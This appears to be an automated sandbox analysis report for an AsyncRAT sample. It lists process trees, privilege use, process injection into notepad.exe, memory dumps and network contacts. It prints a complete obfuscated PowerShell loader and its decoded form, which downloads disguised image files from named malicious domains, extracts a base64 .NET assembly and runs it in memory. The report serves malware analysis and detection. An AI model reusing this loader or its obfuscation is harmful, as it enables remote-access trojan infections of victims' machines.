Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\windows_update\upload.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTreNDgTreDgTreoDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreJDgTreB3DgTreGUDgTreYgBDDgTreGwDgTreaQBlDgTreG4DgTredDgTreDgTregDgTreD0DgTreIDgTreBODgTreGUDgTredwDgTretDgTreE8DgTreYgBqDgTreGUDgTreYwB0DgTreCDgTreDgTreUwB5DgTreHMDgTredDgTreBlDgTreG0DgTreLgBODgTreGUDgTredDgTreDgTreuDgTreFcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreDsDgTreIDgTreDgTreNDgTreDgTreoDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCDgTreDgTrePQDgTregDgTreEcDgTreZQB0DgTreC0DgTreUgBhDgTreG4DgTreZDgTreBvDgTreG0DgTreIDgTreDgTretDgTreEkDgTrebgBwDgTreHUDgTredDgTreBPDgTreGIDgTreagBlDgTreGMDgTredDgTreDgTregDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCDgTreDgTreLQBDDgTreG8DgTredQBuDgTreHQDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTreuDgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreDsDgTreIDgTreDgTreNDgTreDgTreoDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTrecgBlDgTreHQDgTredQByDgTreG4DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreDgTre0DgTreCgDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreByDgTreGUDgTredDgTreB1DgTreHIDgTrebgDgTregDgTreCQDgTrebgB1DgTreGwDgTrebDgTreDgTregDgTreH0DgTreOwDgTregDgTreDgTre0DgTreCgDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTrebgBhDgTreG4DgTrebwBzDgTreGgDgTreaQBlDgTreGwDgTreZDgTreDgTreuDgTreHDgTreDgTrecgBvDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreMgDgTreuDgTreGoDgTrecDgTreBnDgTreD8DgTreMQDgTre2DgTreDYDgTreMQDgTre1DgTreDQDgTreNwDgTreyDgTreDUDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTrebgBhDgTreG4DgTrebwBzDgTreGgDgTreZDgTreDgTreuDgTreHDgTreDgTrecgBvDgTreC8DgTreZgBpDgTreGwDgTreZQBzDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNDgTreDgTre0DgTreDQDgTreMQDgTre3DgTreDIDgTreMwDgTrenDgTreCkDgTreOwDgTreNDgTreDgTreoDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTre7DgTreDgTre0DgTreCgDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreGkDgTreZgDgTregDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCDgTreDgTreLQBuDgTreGUDgTreIDgTreDgTrekDgTreG4DgTredQBsDgTreGwDgTreKQDgTregDgTreHsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBUDgTreGUDgTreeDgTreB0DgTreCDgTreDgTrePQDgTregDgTreFsDgTreUwB5DgTreHMDgTredDgTreBlDgTreG0DgTreLgBUDgTreGUDgTreeDgTreB0DgTreC4DgTreRQBuDgTreGMDgTrebwBkDgTreGkDgTrebgBnDgTreF0DgTreOgDgTre6DgTreFUDgTreVDgTreBGDgTreDgDgTreLgBHDgTreGUDgTredDgTreBTDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreEIDgTreeQB0DgTreGUDgTrecwDgTrepDgTreDsDgTreDQDgTreKDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreRgBsDgTreGEDgTreZwDgTregDgTreD0DgTreIDgTreDgTrenDgTreDwDgTrePDgTreBCDgTreEEDgTreUwBFDgTreDYDgTreNDgTreBfDgTreFMDgTreVDgTreBBDgTreFIDgTreVDgTreDgTre+DgTreD4DgTreJwDgTre7DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCDgTreDgTrePQDgTregDgTreCcDgTrePDgTreDgTre8DgTreEIDgTreQQBTDgTreEUDgTreNgDgTre0DgTreF8DgTreRQBODgTreEQDgTrePgDgTre+DgTreCcDgTreOwDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBUDgTreGUDgTreeDgTreB0DgTreC4DgTreSQBuDgTreGQDgTreZQB4DgTreE8DgTreZgDgTreoDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreKQDgTre7DgTreCDgTreDgTreDQDgTreKDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBJDgTreG4DgTreZDgTreBlDgTreHgDgTreTwBmDgTreCgDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTreNDgTreDgTreoDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreBpDgTreGYDgTreIDgTreDgTreoDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreC0DgTreZwBlDgTreCDgTreDgTreMDgTreDgTregDgTreC0DgTreYQBuDgTreGQDgTreIDgTreDgTrekDgTreGUDgTrebgBkDgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreC0DgTreZwB0DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreKwDgTre9DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreRgBsDgTreGEDgTreZwDgTreuDgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreDsDgTreIDgTreDgTreNDgTreDgTreoDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreJDgTreBiDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreGUDgTrebgBkDgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreC0DgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreOwDgTreNDgTreDgTreoDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreFMDgTredQBiDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCwDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreCkDgTreOwDgTreNDgTreDgTreoDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTrekDgTreGMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreQgB5DgTreHQDgTreZQBzDgTreCDgTreDgTrePQDgTregDgTreFsDgTreUwB5DgTreHMDgTredDgTreBlDgTreG0DgTreLgBDDgTreG8DgTrebgB2DgTreGUDgTrecgB0DgTreF0DgTreOgDgTre6DgTreEYDgTrecgBvDgTreG0DgTreQgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreUwB0DgTreHIDgTreaQBuDgTreGcDgTreKDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFIDgTreZQBmDgTreGwDgTreZQBjDgTreHQDgTreaQBvDgTreG4DgTreLgBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreXQDgTre6DgTreDoDgTreTDgTreBvDgTreGEDgTreZDgTreDgTreoDgTreCQDgTreYwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreBCDgTreHkDgTredDgTreBlDgTreHMDgTreKQDgTre7DgTreCDgTreDgTreJDgTreB0DgTreHkDgTrecDgTreBlDgTreCDgTreDgTrePQDgTregDgTreCQDgTrebDgTreBvDgTreGEDgTreZDgTreBlDgTreGQDgTreQQBzDgTreHMDgTreZQBtDgTreGIDgTrebDgTreB5DgTreC4DgTreRwBlDgTreHQDgTreVDgTreB5DgTreHDgTreDgTreZQDgTreoDgTreCcDgTredDgTreBlDgTreHMDgTredDgTreBwDgTreG8DgTredwBlDgTreHIDgTrecwBoDgTreGUDgTrebDgTreBsDgTreC4DgTreSDgTreBvDgTreG0DgTreZQDgTrenDgTreCkDgTreOwDgTreNDgTreDgTreoDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreJDgTreBtDgTreGUDgTredDgTreBoDgTreG8DgTreZDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreLgBHDgTreGUDgTredDgTreBNDgTreGUDgTredDgTreBoDgTreG8DgTreZDgTreDgTreoDgTreCcDgTrebDgTreBhDgTreCcDgTreKQDgTreuDgTreEkDgTrebgB2DgTreG8DgTreawBlDgTreCgDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCwDgTreIDgTreBbDgTreG8DgTreYgBqDgTreGUDgTreYwB0DgTreFsDgTreXQBdDgTreCDgTreDgTreKDgTreDgTrenDgTreHQDgTreeDgTreB0DgTreC4DgTreZDgTreBrDgTreG0DgTrebQBJDgTreGgDgTreRgDgTrevDgTreHMDgTreZQBsDgTreGkDgTreZgDgTrevDgTreG8DgTrecgBwDgTreC4DgTreZDgTreBsDgTreGUDgTreaQBoDgTreHMDgTrebwBuDgTreGEDgTrebgDgTrevDgTreC8DgTreOgBzDgTreHDgTreDgTredDgTreB0DgTreGgDgTreJwDgTresDgTreCDgTreDgTreJwDgTrexDgTreCcDgTreLDgTreDgTregDgTreCcDgTreTQB1DgTreHMDgTreaQBjDgTreCcDgTreKQDgTrepDgTreH0DgTrefQDgTre=';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://nanoshield.pro/new_image2.jpg?166154725', 'https://nanoshd.pro/files/new_image.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.dkmmIhF/selif/orp.dleihsonan//:sptth', '1', 'Music'))}}"

Network

Country Destination Domain Proto
US 8.8.8.8:53 nanoshd.pro udp
US 8.8.8.8:53 nanoshield.pro udp
US 104.21.37.30:443 nanoshield.pro tcp

Files

memory/2728-4-0x000000001B590000-0x000000001B872000-memory.dmp

memory/2728-5-0x000007FEF5950000-0x000007FEF62ED000-memory.dmp

memory/2728-7-0x0000000002C90000-0x0000000002D10000-memory.dmp

memory/2728-6-0x0000000001EA0000-0x0000000001EA8000-memory.dmp

memory/2728-8-0x000007FEF5950000-0x000007FEF62ED000-memory.dmp

memory/2728-9-0x0000000002C90000-0x0000000002D10000-memory.dmp

memory/2728-10-0x0000000002C90000-0x0000000002D10000-memory.dmp

memory/2728-11-0x0000000002C90000-0x0000000002D10000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\QIMO6ZYIYLL1WREG6CI1.temp

MD5 8532661d6d819a85f21b22af4639a4ee
SHA1 27ea2be3ad7bc9deeccd32fb7e600d8cfe42a13d
SHA256 29391a67d6c631b21a16033c9d52e9ec0163800893423099d3b0ebb321a59341
SHA512 0f0fd2af39d76c5f13618146e59955fbcb1a25e7c18c3d22ccb2aceb5668ded4c66286837f6aaa428cd27b96e1e6b8ad45cd074346eb5881240cb4ac630fb3ef

memory/2388-17-0x000007FEF5950000-0x000007FEF62ED000-memory.dmp

memory/2388-18-0x0000000002D80000-0x0000000002E00000-memory.dmp

memory/2388-19-0x000007FEF5950000-0x000007FEF62ED000-memory.dmp

memory/2388-21-0x0000000002D80000-0x0000000002E00000-memory.dmp

memory/2388-20-0x0000000002D80000-0x0000000002E00000-memory.dmp

memory/2388-22-0x0000000002D80000-0x0000000002E00000-memory.dmp

memory/2388-23-0x0000000002CA0000-0x0000000002CEE000-memory.dmp

memory/2388-24-0x000007FEF5950000-0x000007FEF62ED000-memory.dmp

memory/2728-25-0x000007FEF5950000-0x000007FEF62ED000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-04-19 07:49

Reported

2024-04-19 07:52

Platform

win10v2004-20240412-en

Max time kernel

145s

Max time network

154s

Command Line

C:\Windows\Explorer.EXE

Signatures

AsyncRat

rat asyncrat

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 3212 created 3428 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE

Async RAT payload

rat
Description Indicator Process Target
N/A N/A N/A N/A

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\notepad.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3212 wrote to memory of 4904 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3212 wrote to memory of 4904 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3212 wrote to memory of 4904 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3212 wrote to memory of 4904 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3212 wrote to memory of 4904 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3212 wrote to memory of 4904 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3212 wrote to memory of 4904 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3212 wrote to memory of 4904 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3212 wrote to memory of 4904 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3212 wrote to memory of 4904 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3212 wrote to memory of 4904 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3212 wrote to memory of 4904 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3212 wrote to memory of 4904 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3212 wrote to memory of 4904 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3212 wrote to memory of 4904 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3212 wrote to memory of 4904 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3212 wrote to memory of 4904 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3212 wrote to memory of 4904 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3212 wrote to memory of 4904 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3212 wrote to memory of 4904 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3212 wrote to memory of 4904 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3212 wrote to memory of 4904 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3212 wrote to memory of 4904 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3212 wrote to memory of 4904 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3212 wrote to memory of 4904 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3212 wrote to memory of 4904 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3212 wrote to memory of 4904 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3212 wrote to memory of 4904 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3212 wrote to memory of 4904 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3212 wrote to memory of 4904 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3212 wrote to memory of 4904 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3212 wrote to memory of 4904 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3212 wrote to memory of 4904 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3212 wrote to memory of 4904 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3212 wrote to memory of 4904 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3212 wrote to memory of 4904 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3212 wrote to memory of 4904 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3212 wrote to memory of 4904 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3212 wrote to memory of 4904 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3212 wrote to memory of 4904 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3212 wrote to memory of 4904 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3212 wrote to memory of 4904 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3212 wrote to memory of 4904 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3212 wrote to memory of 4904 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3212 wrote to memory of 4904 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3212 wrote to memory of 4904 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3212 wrote to memory of 4904 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3212 wrote to memory of 4904 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3212 wrote to memory of 4904 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3212 wrote to memory of 4904 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3212 wrote to memory of 4904 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3212 wrote to memory of 4904 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3212 wrote to memory of 4904 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3212 wrote to memory of 4904 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3212 wrote to memory of 4904 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3212 wrote to memory of 4904 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3212 wrote to memory of 4904 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3212 wrote to memory of 4904 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3212 wrote to memory of 4904 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3212 wrote to memory of 4904 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3212 wrote to memory of 4904 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3212 wrote to memory of 4904 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3212 wrote to memory of 4904 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3212 wrote to memory of 4904 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\windows_update\file.ps1

C:\Windows\System32\notepad.exe

C:\Windows\System32\notepad.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 72.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 241.197.17.2.in-addr.arpa udp
US 8.8.8.8:53 kdfsv.duckdns.org udp
GB 154.30.255.175:8890 kdfsv.duckdns.org tcp
